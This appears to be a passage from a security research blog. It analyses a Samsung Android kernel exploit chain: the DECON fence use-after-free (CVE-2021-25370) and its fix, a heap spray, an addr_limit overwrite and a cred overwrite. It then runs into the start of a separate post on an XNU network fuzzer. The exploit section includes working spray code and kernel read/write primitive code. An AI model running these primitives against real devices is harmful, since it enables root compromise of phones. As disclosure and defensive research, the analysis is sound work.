The driver then calls fd_install on the fd and file pointer, which makes the fd accessible from userspace and transfers ownership of the reference to the fd table. Userspace is able to call close on that fd. If that fd holds the only reference to the file struct, then the file struct is freed. However, the driver continues to use the pointer to that freed file struct.

static int decon_set_win_config(struct decon_device *decon,

                struct decon_win_config_data *win_data)

{

        int num_of_window = 0;

        struct decon_reg_data *regs;

        struct sync_file *sync_file;

        int i, j, ret = 0;

[...]

        num_of_window = decon_get_active_win_count(decon, win_data);

        if (num_of_window) {

                win_data->retire_fence = decon_create_fence(decon, &sync_file);

                if (win_data->retire_fence < 0)

                        goto err_prepare;

        } else {

[...]

        if (num_of_window) {

                fd_install(win_data->retire_fence, sync_file->file);

                decon_create_release_fences(decon, win_data, sync_file);

#if !defined(CONFIG_SUPPORT_LEGACY_FENCE)

                regs->retire_fence = dma_fence_get(sync_file->fence);

#endif

        }

[...]

        return ret;

}

In this case, decon_set_win_config acquires the fd for retire_fence in decon_create_fence.

int decon_create_fence(struct decon_device *decon, struct sync_file **sync_file)

{

        struct dma_fence *fence;

        int fd = -EMFILE;

        fence = kzalloc(sizeof(*fence), GFP_KERNEL);

        if (!fence)

                return -ENOMEM;

        dma_fence_init(fence, &decon_fence_ops, &decon->fence.lock,

                   decon->fence.context,

                   atomic_inc_return(&decon->fence.timeline));

        *sync_file = sync_file_create(fence);

        dma_fence_put(fence);

        if (!(*sync_file)) {

                decon_err("%s: failed to create sync file\n", __func__);

                return -ENOMEM;

        }

        fd = decon_get_valid_fd();

        if (fd < 0) {

                decon_err("%s: failed to get unused fd\n", __func__);

                fput((*sync_file)->file);

        }

        return fd;

}

The function then calls fd_install(win_data->retire_fence, sync_file->file) which means that userspace can now access the fd. When fd_install is called, another reference is not taken on the file so when userspace calls close(fd), the only reference on the file is dropped and the file struct is freed. The issue is that after calling fd_install the function then calls decon_create_release_fences(decon, win_data, sync_file) with the same sync_file that contains the pointer to the freed file struct. 

void decon_create_release_fences(struct decon_device *decon,

                struct decon_win_config_data *win_data,

                struct sync_file *sync_file)

{

        int i = 0;

        for (i = 0; i < decon->dt.max_win; i++) {

                int state = win_data->config[i].state;

                int rel_fence = -1;

                if (state == DECON_WIN_STATE_BUFFER) {

                        rel_fence = decon_get_valid_fd();

                        if (rel_fence < 0) {

                                decon_err("%s: failed to get unused fd\n",

                                                __func__);

                                goto err;

                        }

                        fd_install(rel_fence, get_file(sync_file->file));

                }

                win_data->config[i].rel_fence = rel_fence;

        }

        return;

err:

        while (i-- > 0) {

                if (win_data->config[i].state == DECON_WIN_STATE_BUFFER) {

                        put_unused_fd(win_data->config[i].rel_fence);

                        win_data->config[i].rel_fence = -1;

                }

        }

        return;

}

decon_create_release_fences gets a new fd, but then associates that new fd with the freed file struct, sync_file->file, in the call to fd_install.

When decon_set_win_config returns, retire_fence is the closed fd that points to the freed file struct and rel_fence is the open fd that points to the freed file struct.

Fixing the vulnerability

Samsung fixed this use-after-free in March 2021 as CVE-2021-25370. The fix was to move the call to fd_install in decon_set_win_config to the latest possible point in the function after the call to decon_create_release_fences.

        if (num_of_window) {

-               fd_install(win_data->retire_fence, sync_file->file);

                decon_create_release_fences(decon, win_data, sync_file);

#if !defined(CONFIG_SUPPORT_LEGACY_FENCE)

                regs->retire_fence = dma_fence_get(sync_file->fence);

#endif

        }

        decon_hiber_block(decon);

        mutex_lock(&decon->up.lock);

        list_add_tail(&regs->list, &decon->up.list);

+       atomic_inc(&decon->up.remaining_frame);

        decon->update_regs_list_cnt++;

+       win_data->extra.remained_frames = atomic_read(&decon->up.remaining_frame);

        mutex_unlock(&decon->up.lock);

        kthread_queue_work(&decon->up.worker, &decon->up.work);

+       /*

+        * The code is moved here because the DPU driver may get a wrong fd

+        * through the released file pointer,

+        * if the user(HWC) closes the fd and releases the file pointer.

+        *

+        * Since the user land can use fd from this point/time,

+        * it can be guaranteed to use an unreleased file pointer

+        * when creating a rel_fence in decon_create_release_fences(...)

+        */

+       if (num_of_window)

+               fd_install(win_data->retire_fence, sync_file->file);

        mutex_unlock(&decon->lock);

Heap Grooming and Spray

To groom the heap the exploit first opens and closes 30,000+ files using memfd_create. Then, the exploit sprays the heap with fake file structs. On this version of the Samsung kernel, the file struct is 0x140 bytes. In these new, fake file structs, the exploit sets four of the members:

fake_file.f_u = 0x1010101;

fake_file.f_op = kaddr - 0x2071B0+0x1094E80;

fake_file.f_count = 0x7F;

fake_file.private_data = addr_limit_ptr;

The f_op member is set to the signalfd_fops for reasons we will cover below in the “Overwriting the addr_limit” section. kaddr is the address leaked using vulnerability #2 described previously. The addr_limit_ptr was calculated by adding 8 to the task_struct address also leaked using vulnerability #2.

The exploit sprays 25 of these structs across the heap using the MEM_PROFILE_ADD ioctl in the Mali driver.

/**

 * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel

 * @buffer: Pointer to the information

 * @len: Length

 * @padding: Padding

 *

 * The data provided is accessible through a debugfs file

 */

struct kbase_ioctl_mem_profile_add {

        __u64 buffer;

        __u32 len;

        __u32 padding;

};

#define KBASE_IOCTL_MEM_PROFILE_ADD \

        _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add)

static int kbase_api_mem_profile_add(struct kbase_context *kctx,

                struct kbase_ioctl_mem_profile_add *data)

{

        char *buf;

        int err;

        if (data->len > KBASE_MEM_PROFILE_MAX_BUF_SIZE) {

                dev_err(kctx->kbdev->dev, "mem_profile_add: buffer too big\n");

                return -EINVAL;

        }

        buf = kmalloc(data->len, GFP_KERNEL);

        if (ZERO_OR_NULL_PTR(buf))

                return -ENOMEM;

        err = copy_from_user(buf, u64_to_user_ptr(data->buffer),

                        data->len);

        if (err) {

                kfree(buf);

                return -EFAULT;

        }

        return kbasep_mem_profile_debugfs_insert(kctx, buf, data->len);

}

This ioctl takes a pointer to a buffer, the length of the buffer, and padding as arguments. kbase_api_mem_profile_add will allocate a buffer on the kernel heap and then will copy the passed buffer from userspace into the newly allocated kernel buffer.

Finally, kbase_api_mem_profile_add calls kbasep_mem_profile_debugfs_insert. This technique only works when the device is running a kernel with CONFIG_DEBUG_FS enabled. The purpose of the MEM_PROFILE_ADD ioctl is to write a buffer to DebugFS. As of Android 11, DebugFS should not be enabled on production devices. Whenever Android launches new requirements like this, it only applies to devices launched on that new version of Android. Android 11 launched in September 2020 and the exploit was found in November 2020 so it makes sense that the exploit targeted devices Android 10 and before where DebugFS would have been mounted.

Screenshot of the DebugFS section from https://source.android.com/docs/setup/about/android-11-release#debugfs. The highlighted text reads: "Android 11 removes platform support for DebugFS and requires that it not be mounted or accessed on production devices"

For example, on the A51 exynos device (SM-A515F) which launched on Android 10, both CONFIG_DEBUG_FS is enabled and DebugFS is mounted.

a51:/ $ getprop ro.build.fingerprint

samsung/a51nnxx/a51:11/RP1A.200720.012/A515FXXU4DUB1:user/release-keys

a51:/ $ getprop ro.build.version.security_patch

2021-02-01

a51:/ $ uname -a

Linux localhost 4.14.113-20899478 #1 SMP PREEMPT Mon Feb 1 15:37:03 KST 2021 aarch64

a51:/ $ cat /proc/config.gz | gunzip | cat | grep CONFIG_DEBUG_FS                                                                          

CONFIG_DEBUG_FS=y

a51:/ $ cat /proc/mounts | grep debug                                                                                                      

/sys/kernel/debug /sys/kernel/debug debugfs rw,seclabel,relatime 0 0

Because DebugFS is mounted, the exploit is able to use the MEM_PROFILE_ADD ioctl to groom the heap. If DebugFS wasn’t enabled or mounted, kbasep_mem_profile_debugfs_insert would simply free the newly allocated kernel buffer and return.

#ifdef CONFIG_DEBUG_FS

int kbasep_mem_profile_debugfs_insert(struct kbase_context *kctx, char *data,

                                        size_t size)

{

        int err = 0;

        mutex_lock(&kctx->mem_profile_lock);

        dev_dbg(kctx->kbdev->dev, "initialised: %d",

                kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED));

        if (!kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED)) {

                if (IS_ERR_OR_NULL(kctx->kctx_dentry)) {

                        err  = -ENOMEM;

                } else if (!debugfs_create_file("mem_profile", 0444,

                                        kctx->kctx_dentry, kctx,

                                        &kbasep_mem_profile_debugfs_fops)) {

                        err = -EAGAIN;

                } else {

                        kbase_ctx_flag_set(kctx,

                                           KCTX_MEM_PROFILE_INITIALIZED);

                }

        }

        if (kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED)) {

                kfree(kctx->mem_profile_data);

                kctx->mem_profile_data = data;

                kctx->mem_profile_size = size;

        } else {

                kfree(data);

        }

        dev_dbg(kctx->kbdev->dev, "returning: %d, initialised: %d",

                err, kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED));

        mutex_unlock(&kctx->mem_profile_lock);

        return err;

}

#else /* CONFIG_DEBUG_FS */

int kbasep_mem_profile_debugfs_insert(struct kbase_context *kctx, char *data,

                                        size_t size)

{

        kfree(data);

        return 0;

}

#endif /* CONFIG_DEBUG_FS */

By writing the fake file structs as a single 0x2000-byte buffer rather than as 25 individual 0x140-byte buffers, the exploit writes its fake structs across two whole pages, which increases the odds of reallocating over the freed file struct.
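A sketch of that spray. The struct layout and ioctl number follow the kbase driver header excerpted above; dev_mali_fd is assumed to be an open fd to the Mali device:

#include <stdint.h>
#include <string.h>
#include <sys/ioctl.h>

/* Per the driver header shown above. */
struct kbase_ioctl_mem_profile_add {
        uint64_t buffer;
        uint32_t len;
        uint32_t padding;
};

#define KBASE_IOCTL_TYPE 0x80
#define KBASE_IOCTL_MEM_PROFILE_ADD \
        _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add)

/* Sketch: tile 25 copies of the 0x140-byte fake file struct into a single
 * 0x2000-byte buffer and let the driver copy it onto the kernel heap. */
static void spray_fake_files(int dev_mali_fd, const void *fake_file)
{
        static char spray[0x2000];
        struct kbase_ioctl_mem_profile_add arg = { 0 };
        unsigned i;

        for (i = 0; i < 25; i++)
                memcpy(spray + i * 0x140, fake_file, 0x140);

        arg.buffer = (uintptr_t)spray;
        arg.len = sizeof(spray);
        ioctl(dev_mali_fd, KBASE_IOCTL_MEM_PROFILE_ADD, &arg);
}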

The exploit then calls dup2 on the dangling fds. The dup2 syscall will open another fd on the same open file structure that the original points to. In this case, the exploit is calling dup2 to verify that it successfully reallocated a fake file structure in the same place as the freed file structure. dup2 will increment the reference count (f_count) in the file structure. In all of our fake file structures, the f_count was set to 0x7F. So if any of them are incremented to 0x80, the exploit knows that it successfully reallocated over the freed file struct.

To determine if any of the file struct’s refcounts were incremented, the exploit iterates through each of the directories under /sys/kernel/debug/mali/mem/ and reads each directory’s mem_profile contents. If it finds the byte 0x80, then it knows that it successfully reallocated the freed struct and that the f_count of the fake file struct was incremented.
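A sketch of that verification step. To keep the example self-contained, the check here compares the read-back contents against the original spray buffer and looks for the single byte that changed from 0x7F to 0x80 (the f_count bump):

#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Sketch: dup2 bumps f_count on whatever file struct the dangling fd points
 * at; if one of our sprayed mem_profile buffers now differs from what we
 * wrote (0x7F -> 0x80), the reallocation worked. */
static int reallocation_succeeded(int dangling_fd, const char *orig_spray)
{
        char path[256], buf[0x2000];
        struct dirent *de;
        DIR *dir;
        int hit = 0;

        dup2(dangling_fd, 512);         /* any spare fd number works */

        dir = opendir("/sys/kernel/debug/mali/mem");
        if (!dir)
                return -1;
        while (!hit && (de = readdir(dir)) != NULL) {
                int fd;
                ssize_t n, j;
                if (de->d_name[0] == '.')
                        continue;
                snprintf(path, sizeof(path),
                         "/sys/kernel/debug/mali/mem/%s/mem_profile", de->d_name);
                fd = open(path, O_RDONLY);
                if (fd < 0)
                        continue;
                n = read(fd, buf, sizeof(buf));
                close(fd);
                for (j = 0; j < n; j++) {
                        if (buf[j] != orig_spray[j] &&
                            (unsigned char)orig_spray[j] == 0x7F &&
                            (unsigned char)buf[j] == 0x80) {
                                hit = 1;        /* f_count went 0x7F -> 0x80 */
                                break;
                        }
                }
        }
        closedir(dir);
        return hit;
}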

Overwriting the addr_limit

Like many previous Android exploits, to gain arbitrary kernel read and write, the exploit overwrites the kernel address limit (addr_limit). The addr_limit defines the address range that the kernel may access when dereferencing userspace pointers. For userspace threads, the addr_limit is usually USER_DS or 0x7FFFFFFFFF. For kernel threads, it’s usually KERNEL_DS or 0xFFFFFFFFFFFFFFFF.  

Userspace operations only access addresses below the addr_limit. Therefore, by raising the addr_limit by overwriting it, we will make kernel memory accessible to our unprivileged process. The exploit uses the syscall signalfd with the dangling fd to do this.

signalfd(dangling_fd, 0xFFFFFF8000000000, 8);

According to the man pages, the syscall signalfd is:

signalfd() creates a file descriptor that can be used to accept signals targeted at the caller.  This provides an alternative to the use of a signal handler or sigwaitinfo(2), and has the advantage that the file descriptor may be monitored by select(2), poll(2), and epoll(7).

int signalfd(int fd, const sigset_t *mask, int flags);

The exploit called signalfd on the file descriptor that was found to replace the freed one in the previous step. When signalfd is called on an existing file descriptor, only the mask is updated based on the mask passed as the argument, which gives the exploit an 8-byte write to the sigmask of the signalfd_ctx struct.

typedef unsigned long sigset_t;

struct signalfd_ctx {

        sigset_t sigmask;

};

The file struct includes a field called private_data that is a void *. File structs for signalfd file descriptors store the pointer to the signalfd_ctx struct in the private_data field. As shown above, the signalfd_ctx struct is simply an 8 byte structure that contains the mask.

Let’s walk through how the signalfd source code updates the mask:

SYSCALL_DEFINE4(signalfd4, int, ufd, sigset_t __user *, user_mask,

                size_t, sizemask, int, flags)

{

        sigset_t sigmask;

        struct signalfd_ctx *ctx;

        /* Check the SFD_* constants for consistency.  */

        BUILD_BUG_ON(SFD_CLOEXEC != O_CLOEXEC);

        BUILD_BUG_ON(SFD_NONBLOCK != O_NONBLOCK);

        if (flags & ~(SFD_CLOEXEC | SFD_NONBLOCK))

                return -EINVAL;

        if (sizemask != sizeof(sigset_t) ||

            copy_from_user(&sigmask, user_mask, sizeof(sigmask)))

               return -EINVAL;

        sigdelsetmask(&sigmask, sigmask(SIGKILL) | sigmask(SIGSTOP));

        signotset(&sigmask);                                      // [1]

        if (ufd == -1) {                                          // [2]

                ctx = kmalloc(sizeof(*ctx), GFP_KERNEL);

                if (!ctx)

                        return -ENOMEM;

                ctx->sigmask = sigmask;

                /*

                 * When we call this, the initialization must be complete, since

                 * anon_inode_getfd() will install the fd.

                 */

                ufd = anon_inode_getfd("[signalfd]", &signalfd_fops, ctx,

                                       O_RDWR | (flags & (O_CLOEXEC | O_NONBLOCK)));

                if (ufd < 0)

                        kfree(ctx);

        } else {                                                 // [3]

                struct fd f = fdget(ufd);

                if (!f.file)

                        return -EBADF;

                ctx = f.file->private_data;                      // [4]

                if (f.file->f_op != &signalfd_fops) {            // [5]

                        fdput(f);

                        return -EINVAL;

                }

                spin_lock_irq(&current->sighand->siglock);

                ctx->sigmask = sigmask;                         // [6] WRITE!

                spin_unlock_irq(&current->sighand->siglock);

                wake_up(&current->sighand->signalfd_wqh);

                fdput(f);

        }

        return ufd;

}

First the function modifies the mask that was passed in. The mask passed into the function is the signals that should be accepted via the file descriptor, but the sigmask member of the signalfd_ctx struct represents the signals that should be blocked. The sigdelsetmask and signotset calls at [1] make this change. The call to sigdelsetmask ensures that the SIGKILL and SIGSTOP signals are always blocked: it clears bit 8 (SIGKILL) and bit 18 (SIGSTOP) so that they end up set after the inversion. Then signotset flips each bit in the mask. The mask that is written is ~(mask_in_arg & 0xFFFFFFFFFFFBFEFF).

The function checks whether or not the file descriptor passed in is -1 at [2]. In this exploit’s case it’s not so we fall into the else block at [3]. At [4] the signalfd_ctx* is set to the private_data pointer.

The signalfd manual page also says that the fd argument “must specify a valid existing signalfd file descriptor”. To verify this, at [5] the syscall checks if the underlying file’s f_op equals the signalfd_fops. This is why the f_op was set to signalfd_fops in the previous section. Finally at [6], the overwrite occurs. The user provided mask is written to the address in private_data. In the exploit’s case, the fake file struct’s private_data was set to the addr_limit pointer. So when the mask is written, we’re actually overwriting the addr_limit.

The exploit calls signalfd with a mask argument of 0xFFFFFF8000000000. So the value written is ~(0xFFFFFF8000000000 & 0xFFFFFFFFFFFBFEFF) = 0x7FFFFFFFFF, also known as USER_DS. We’ll talk about why they’re overwriting the addr_limit as USER_DS rather than KERNEL_DS in the next section.
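As a quick sanity check of that arithmetic, a standalone snippet (not exploit code):

#include <stdio.h>

int main(void)
{
        unsigned long arg  = 0xFFFFFF8000000000UL;  /* mask passed to signalfd */
        unsigned long keep = 0xFFFFFFFFFFFBFEFFUL;  /* SIGKILL/SIGSTOP bits cleared */

        /* sigdelsetmask then signotset: the value written to ctx->sigmask */
        printf("0x%lx\n", ~(arg & keep));           /* prints 0x7fffffffff (USER_DS) */
        return 0;
}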

Working Around UAO and PAN

“User-Access Override” (UAO) and “Privileged Access Never” (PAN) are two exploit mitigations that are commonly found on modern Android devices. Their kernel configs are CONFIG_ARM64_UAO and CONFIG_ARM64_PAN. Both PAN and UAO are hardware mitigations released on ARMv8 CPUs. PAN protects against the kernel directly accessing user-space memory. UAO works with PAN by allowing unprivileged load and store instructions to act as privileged load and store instructions when the UAO bit is set.

It’s often said that the addr_limit overwrite technique detailed above doesn’t work on devices with UAO and PAN turned on. The commonly used addr_limit overwrite technique was to change the addr_limit to a very high address, like 0xFFFFFFFFFFFFFFFF (KERNEL_DS), and then use a pair of pipes for arbitrary kernel read and write. This is what Jann and I did in our proof-of-concept for CVE-2019-2215 back in 2019. Our kernel_write function is shown below.

void kernel_write(unsigned long kaddr, void *buf, unsigned long len) {

  errno = 0;

  if (len > 0x1000) errx(1, "kernel writes over PAGE_SIZE are messy, tried 0x%lx", len);

  if (write(kernel_rw_pipe[1], buf, len) != len) err(1, "kernel_write failed to load userspace buffer");

  if (read(kernel_rw_pipe[0], (void*)kaddr, len) != len) err(1, "kernel_write failed to overwrite kernel memory");

}

This technique works by first writing the contents that you’d like written into one end of the pipe. By then calling read on the other end of the pipe with the kernel address you’d like to write to as the destination buffer, those contents are written to that kernel memory address.

With UAO and PAN enabled, if the addr_limit is set to KERNEL_DS and we attempt to execute this function, the first write call will fail because buf is in user-space memory and PAN prevents the kernel from accessing user space memory.

Let’s say we didn’t set the addr_limit to KERNEL_DS (-1) and instead set it to -2, a high kernel address that’s not KERNEL_DS. PAN wouldn’t be enabled, but neither would UAO. Without UAO enabled, the unprivileged load and store instructions are not able to access the kernel memory.

The way the exploit works around the constraints of UAO and PAN is pretty straightforward: the exploit switches the addr_limit between USER_DS and KERNEL_DS based on whether it needs to access user space or kernel space memory. As shown in the uao_thread_switch function below, UAO is enabled when addr_limit == KERNEL_DS and disabled otherwise.

/* Restore the UAO state depending on next's addr_limit */

void uao_thread_switch(struct task_struct *next)

{

        if (IS_ENABLED(CONFIG_ARM64_UAO)) {

                if (task_thread_info(next)->addr_limit == KERNEL_DS)

                        asm(ALTERNATIVE("nop", SET_PSTATE_UAO(1), ARM64_HAS_UAO));

                else

                        asm(ALTERNATIVE("nop", SET_PSTATE_UAO(0), ARM64_HAS_UAO));

        }

}

The exploit was able to use this technique of toggling the addr_limit between USER_DS and KERNEL_DS because they had such a good primitive from the use-after-free and could reliably and repeatedly write a new value to the addr_limit by calling signalfd. The exploit’s function to write to kernel addresses is shown below:

kernel_write(void *kaddr, const void *buf, unsigned long buf_len)

{

  unsigned long USER_DS = 0x7FFFFFFFFF;

  write(kernel_rw_pipe2, buf, buf_len);                   // [1]

  write(kernel_rw_pipe2, &USER_DS, 8u);                   // [2]

  set_addr_limit_to_KERNEL_DS();                          // [3]            

  read(kernel_rw_pipe, kaddr, buf_len);                   // [4]

  read(kernel_rw_pipe, addr_limit_ptr, 8u);               // [5]

}

The function takes three arguments: the kernel address to write to (kaddr), a pointer to the buffer of contents to write (buf), and the length of the buffer (buf_len). buf is in userspace. When the kernel_write function is entered, the addr_limit is currently set to USER_DS. At [1] the exploit writes the contents of buf to the pipe. The 8-byte USER_DS value is written to the pipe at [2].

The set_addr_limit_to_KERNEL_DS function at [3] sends a signal to tell another process in the exploit to call signalfd with a mask of 0. Because signalfd performs a NOT on the bits provided in the mask in signotset, the value 0xFFFFFFFFFFFFFFFF (KERNEL_DS) is written to the addr_limit.

Now that the addr_limit is set to KERNEL_DS the exploit can access kernel memory. At [4], the exploit reads from the pipe, writing the contents to kaddr. Then at [5] the exploit returns addr_limit back to USER_DS by reading the value from the pipe that was written at [2] and writing it back to the addr_limit. The exploit’s function to read from kernel memory is the mirror image of this function.
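For completeness, a plausible reconstruction of that mirror-image read primitive, relying on the same pipe fds, addr_limit_ptr, and set_addr_limit_to_KERNEL_DS helper as kernel_write above (a sketch, not the sample's code): the USER_DS restore value is queued into the pipe while userspace is still accessible, the kernel contents are appended once the addr_limit is KERNEL_DS, and the two reads first restore the addr_limit and then copy the contents out.

void kernel_read(void *kaddr, void *buf, unsigned long buf_len)

{

  unsigned long USER_DS = 0x7FFFFFFFFF;

  write(kernel_rw_pipe2, &USER_DS, 8u);        // [1] queue the restore value while userspace is still accessible

  set_addr_limit_to_KERNEL_DS();               // [2]

  write(kernel_rw_pipe2, kaddr, buf_len);      // [3] kernel contents -> pipe (requires KERNEL_DS)

  read(kernel_rw_pipe, addr_limit_ptr, 8u);    // [4] pull USER_DS back into the addr_limit

  read(kernel_rw_pipe, buf, buf_len);          // [5] now copy the contents into the userspace buffer

}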

I’m deliberately not calling this a bypass because UAO and PAN are acting exactly as they were designed to: preventing the kernel from accessing user-space memory. UAO and PAN were not designed to protect against arbitrary write access to the addr_limit.

Post-exploitation

The exploit now has arbitrary kernel read and write. It then follows the steps seen in most other Android exploits: overwrite the cred struct for the current process and overwrite the loaded SELinux policy to change the current process’s context to vold. vold is the “Volume Daemon”, which is responsible for mounting and unmounting external storage. vold runs as root, and while it’s a userspace service, it’s considered kernel-equivalent as described in the Android documentation on security contexts. Because it’s such a highly privileged security context, it’s a prime target for the exploit’s SELinux context switch.

[Screenshot of the “OS Kernel” section from https://source.android.com/docs/security/overview/updates-resources#process_types. It reads: “Functionality that: is part of the kernel; runs in the same CPU context as the kernel (for example, device drivers); has direct access to kernel memory (for example, hardware components on the device); has the capability to load scripts into a kernel component (for example, eBPF); is one of a handful of user services that's considered kernel equivalent (such as, apexd, bpfloader, init, ueventd, and vold).”]
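
As a rough illustration of the first post-exploitation step, the cred overwrite with these primitives typically looks something like the sketch below, using the kernel read/write helpers from earlier. find_current_task and the offsets are hypothetical placeholders (the real exploit resolves them for the specific kernel build), and the SELinux policy overwrite that switches the context to vold is a separate step not shown here.

// Hedged sketch of a typical cred overwrite; not the sample's actual code.
// OFFSET_OF_CRED, OFFSET_OF_UID, and find_current_task() are hypothetical.
void become_root(void)
{
  unsigned long task = find_current_task();            // e.g. derived from a leaked kernel pointer
  unsigned long cred = 0;
  kernel_read(&cred, (void *)(task + OFFSET_OF_CRED), 8);

  unsigned int root_id = 0;
  // In this kernel version the eight IDs (uid, gid, suid, sgid, euid, egid,
  // fsuid, fsgid) are laid out consecutively in struct cred.
  for (int i = 0; i < 8; i++)
    kernel_write((void *)(cred + OFFSET_OF_UID + 4 * i), &root_id, 4);
}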

As stated at the beginning of this post, the sample obtained was discovered in the preparatory stages of the attack. Unfortunately, it did not include the final payload that would have been deployed with this exploit.

Conclusion

This in-the-wild exploit chain is a great example of an attack surface and “shape” that differ from many of the Android exploits we’ve seen in the past. All three vulnerabilities in this chain were in the manufacturer’s custom components rather than in the AOSP platform or the Linux kernel. It’s also interesting to note that 2 of the 3 vulnerabilities were logic and design vulnerabilities rather than memory safety issues. Of the 10 other Android in-the-wild 0-days that we’ve tracked since mid-2014, only 2 were not memory corruption vulnerabilities.

The first vulnerability in this chain, the arbitrary file read and write (CVE-2021-25337), was the foundation of the chain: it was used 4 different times, at least once in each step. The vulnerability was in the Java code of a custom content provider in the system_server. The Java components in Android devices don’t tend to be the most popular targets for security researchers despite running at such a privileged level. This highlights an area for further research.

Labeling when vulnerabilities are known to be exploited in-the-wild is important both for targeted users and for the security industry. When in-the-wild 0-days are not transparently disclosed, we are not able to use that information to further protect users, using patch analysis and variant analysis, to gain an understanding of what attackers already know.

The analysis of this exploit chain has provided us with new and important insights into how attackers are targeting Android devices. It highlights a need for more research into manufacturer specific components. It shows where we ought to do further variant analysis. It is a good example of how Android exploits can take many different “shapes” and so brainstorming different detection ideas is a worthwhile exercise. But in this case, we’re at least 18 months behind the attackers: they already know which bugs they’re exploiting and so when this information is not shared transparently, it leaves defenders at a further disadvantage.

This transparent disclosure of in-the-wild status is necessary for both the safety and autonomy of targeted users to protect themselves as well as the security industry to work together to best prevent these 0-days in the future.

Designing sockfuzzer, a network syscall fuzzer for XNU

22 April 2021 at 18:05

Posted by Ned Williamson, Project Zero

Introduction

When I started my 20% project – an initiative where employees are allocated twenty-percent of their paid work time to pursue personal projects –  with Project Zero, I wanted to see if I could apply the techniques I had learned fuzzing Chrome to XNU, the kernel used in iOS and macOS. My interest was sparked after learning some prominent members of the iOS research community believed the kernel was “fuzzed to death,” and my understanding was that most of the top researchers used auditing for vulnerability research. This meant finding new bugs with fuzzing would be meaningful in demonstrating the value of implementing newer fuzzing techniques. In this project, I pursued a somewhat unusual approach to fuzz XNU networking in userland by converting it into a library, “booting” it in userspace and using my standard fuzzing workflow to discover vulnerabilities. Somewhat surprisingly, this worked well enough to reproduce some of my peers’ recent discoveries and report some of my own, one of which was a reliable privilege escalation from the app context, CVE-2019-8605, dubbed “SockPuppet.” I’m excited to open source this fuzzing project, “sockfuzzer,” for the community to learn from and adapt. In this post, we’ll do a deep dive into its design and implementation.

Attack Surface Review and Target Planning

Choosing Networking

We’re at the beginning of a multistage project. I had enormous respect for the difficulty of the task ahead of me. I knew I would need to be careful investing time at each stage of the process, constantly looking for evidence that I needed to change direction. The first big decision was to decide what exactly we wanted to target.

I started by downloading the XNU sources and reviewing them, looking for areas that handled a lot of attacker-controlled input and seemed amenable to fuzzing – immediately the networking subsystem jumped out as worthy of research. I had just exploited a Chrome sandbox bug that leveraged collaboration between an exploited renderer process and a server working in concert. I recognized these attack surfaces’ power, where some security-critical code is “sandwiched” between two attacker-controlled entities. The Chrome browser process is prone to use after free vulnerabilities due to the difficulty of managing state for large APIs, and I suspected XNU would have the same issue. Networking features both parsing and state management. I figured that even if others had already fuzzed the parsers extensively, there could still be use after free vulnerabilities lying dormant.

I then proceeded to look at recent bug reports. Two bugs caught my eye: the mptcp overflow discovered by Ian Beer and the ICMP out of bounds write found by Kevin Backhouse. Both of these are somewhat “straightforward” buffer overflows. The bugs’ simplicity hinted that kernel networking, even packet parsing, was sufficiently undertested. A fuzzer combining network syscalls and arbitrary remote packets should be large enough in scope to reproduce these issues and find new ones.

Digging deeper, I wanted to understand how to reach these bugs in practice. By cross-referencing the functions and setting kernel breakpoints in a VM, I managed to get a more concrete idea. Here’s the call stack for Ian’s MPTCP bug:

The buggy function in question is mptcp_usr_connectx. Moving up the call stack, we find the connectx syscall, which we see in Ian’s original testcase. If we were to write a fuzzer to find this bug, how would we do it? Ultimately, whatever we do has to both find the bug and give us the information we need to reproduce it on the real kernel. Calling mptcp_usr_connectx directly should surely find the bug, but this seems like the wrong idea because it takes a lot of arguments. Modeling a fuzzer well enough to call this function directly in a way representative of the real code is no easier than auditing the code in the first place, so we’ve not made things any easier by writing a targeted fuzzer. It’s also wasted effort to write a target for each function this small. On the other hand, the further up the call stack we go, the more complexity we may have to support and the less chance we have of landing on the bug. If I were trying to unit test the networking stack, I would probably avoid the syscall layer and call the intermediate helper functions as a middle ground. This is exactly what I tried in the first draft of the fuzzer; I used sock_socket to create struct socket* objects to pass to connectitx in the hopes that it would be easy to reproduce this bug while being high-enough level that this bug could plausibly have been discovered without knowing where to look for it. Surprisingly, after some experimentation, it turned out to be easier to simply call the syscalls directly (via connectx). This makes it easier to translate crashing inputs into programs to run against a real kernel since testcases map 1:1 to syscalls. We’ll see more details about this later.

We can’t test networking properly without accounting for packets. In this case, data comes from the hardware, not via syscalls from a user process. We’ll have to expose this functionality to our fuzzer. To figure out how to extend our framework to support random packet delivery, we can use our next example bug. Let’s take a look at the call stack for delivering a packet to trigger the ICMP bug reported by Kevin Backhouse:

To reach the buggy function, icmp_error, the call stack is deeper, and unlike with syscalls, it’s not immediately obvious which of these functions we should call to cover the relevant code. Starting from the very top of the call stack, we see that the crash occurred in a kernel thread running the dlil_input_thread_func function. DLIL stands for Data Link Interface Layer, a reference to the OSI model’s data link layer. Moving further down the stack, we see ether_inet_input, indicating an Ethernet packet (since I tested this issue using Ethernet). We finally make it down to the IP layer, where ip_dooptions signals an icmp_error. As an attacker, we probably don’t have a lot of control over the interface a user uses to receive our input, so we can rule out some of the uppermost layers. We also don’t want to deal with threads in our fuzzer, another design tradeoff we’ll describe in more detail later. proto_input and ip_proto_input don’t do much, so I decided that ip_input was where I would inject packets, simply by calling the function when I wanted to deliver a packet. After reviewing proto_register_input, I discovered another function called ip6_input, which was the entry point for the IPv6 code. Here’s the prototype for ip_input:

void ip_input(struct mbuf *m);


Mbufs are message buffers, a standard buffer format used in network stacks. They enable multiple small packets to be chained together through a linked list. So we just need to generate mbufs with random data before calling ip_input.

I was surprised by how easy it was to work with the network stack compared to the syscall interface. `ip_input` and `ip6_input` are pure functions that don’t require us to know any state to call them. But stepping back, it made more sense. Packet delivery is inherently a clean interface: our kernel has no idea what arbitrary packets may be coming in, so the interface takes a raw packet and then further down in the stack decides how to handle it. Many packets contain metadata that affects the kernel state once received. For example, TCP or UDP packets will be matched to an existing connection by their port number.
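
To make that concrete, a minimal sketch of delivering one fuzzer-generated IPv4 packet might look like the following. fuzz_mbuf_create is a hypothetical helper name standing in for whatever the project actually uses to allocate an mbuf; the sketch assumes XNU’s mbuf definitions and standard headers are available.

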